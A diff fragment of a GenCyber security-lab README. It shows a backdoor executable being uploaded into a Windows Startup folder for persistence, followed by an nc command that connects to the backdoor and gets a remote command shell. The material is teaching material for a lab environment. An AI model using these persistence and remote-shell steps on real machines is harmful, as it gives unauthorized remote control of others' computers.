xinwenfu/GenCyber/SoftwareSecurity/README.md

 [*] Uploaded 49.83 KiB of 49.83 KiB (100.0%): /home/kali/GenCyber/MalwareSamples/Backdoors/SimpleBindBackdoor/nice3.exe -> C:\Users\Malware Analysis\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nice3.exe
 [*] uploaded   : /home/kali/GenCyber/MalwareSamples/Backdoors/SimpleBindBackdoor/nice3.exe -> C:\Users\Malware Analysis\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nice3.exe
 ```
-Please pay attention to how the long folder name with multiple words is quoted.
+Please pay attention to how the long folder name with multiple words and spaces is quoted.

 To find where the startup folder is, press the Windows logo key  + R, type *shell:startup*, then select OK.
 This opens the Startup folder so that you can see where it is.

 3. Restart Windows VM.
-Use *nc* at Kali VM to log into the backdoor
+Use *nc* at Kali VM to log into the backdoor, which spawns a Windows command console.
 ```
 ┌──(kali㉿Cyber-Range)-[~]
 └─$ nc 192.168.1.19 8080